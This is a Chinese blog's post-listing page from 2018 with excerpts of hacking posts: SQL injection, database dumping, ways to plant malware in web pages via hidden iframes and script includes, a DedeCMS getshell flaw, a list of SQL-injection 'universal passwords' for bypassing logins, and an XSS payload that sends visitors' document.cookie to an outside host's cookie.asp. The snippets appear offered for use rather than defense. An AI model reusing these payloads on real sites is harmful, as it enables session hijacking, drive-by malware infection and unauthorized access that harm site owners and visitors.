上一页 1 ··· 48 49 50 51 52 53 54 55 56 ··· 64 下一页
摘要: SQL注入最常见的攻击方式,所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击. 跨站脚本攻击(XSS 阅读全文
posted @ 2018-07-18 11:25 圆柱模板 阅读(309) 评论(0) 推荐(0)
摘要: halt = (DT_DEBUG || IN_ADMIN) ? 1 : 0; $db->pre = $CFG['tb_pre']; $db->connect($CFG['db_host'], $CFG['db_user'], $CFG['db_pass'], $CFG['db_name'], $CFG['db_expires'], $CFG['db_charset'], $CFG['... 阅读全文
posted @ 2018-07-18 11:22 圆柱模板 阅读(660) 评论(0) 推荐(0)
只有注册用户登录后才能阅读该文。 阅读全文
posted @ 2018-07-18 11:07 圆柱模板 阅读(20) 评论(0) 推荐(0)
摘要: 搜索型注入的暴库语句 当猜到tbl_admin这个表名的时候 阅读全文
posted @ 2018-07-18 11:04 圆柱模板 阅读(1048) 评论(0) 推荐(0)
只有注册用户登录后才能阅读该文。 阅读全文
posted @ 2018-07-18 11:02 圆柱模板 阅读(14) 评论(0) 推荐(0)
摘要: Web网页中挂马的方法 一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:j 阅读全文
posted @ 2018-07-18 10:54 圆柱模板 阅读(319) 评论(0) 推荐(0)
摘要: 在CMD 输入 nslookup 域名 例如:nslookup www.baidu.com有CDN的示例Server: cache3-gzAddress: 211.98.4.1Non-authoritative answer:Name: www.baidu.comAddresses: 119.75. 阅读全文
posted @ 2018-07-18 10:49 圆柱模板 阅读(230) 评论(0) 推荐(0)
摘要: 漏洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:开启注册开启投稿注册会员-发表 阅读全文
posted @ 2018-07-18 10:47 圆柱模板 阅读(460) 评论(0) 推荐(0)
摘要: 保存为cookie.asp 利用代码: <script>window.open('http://zhimo.yuanzhumuban.cc/cookie.asp?msg='+document.cookie)</script> 阅读全文
posted @ 2018-07-18 10:41 圆柱模板 阅读(1414) 评论(0) 推荐(0)
摘要: asp aspx万能密码 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1 or '1' 阅读全文
posted @ 2018-07-18 10:39 圆柱模板 阅读(2466) 评论(0) 推荐(0)
上一页 1 ··· 48 49 50 51 52 53 54 55 56 ··· 64 下一页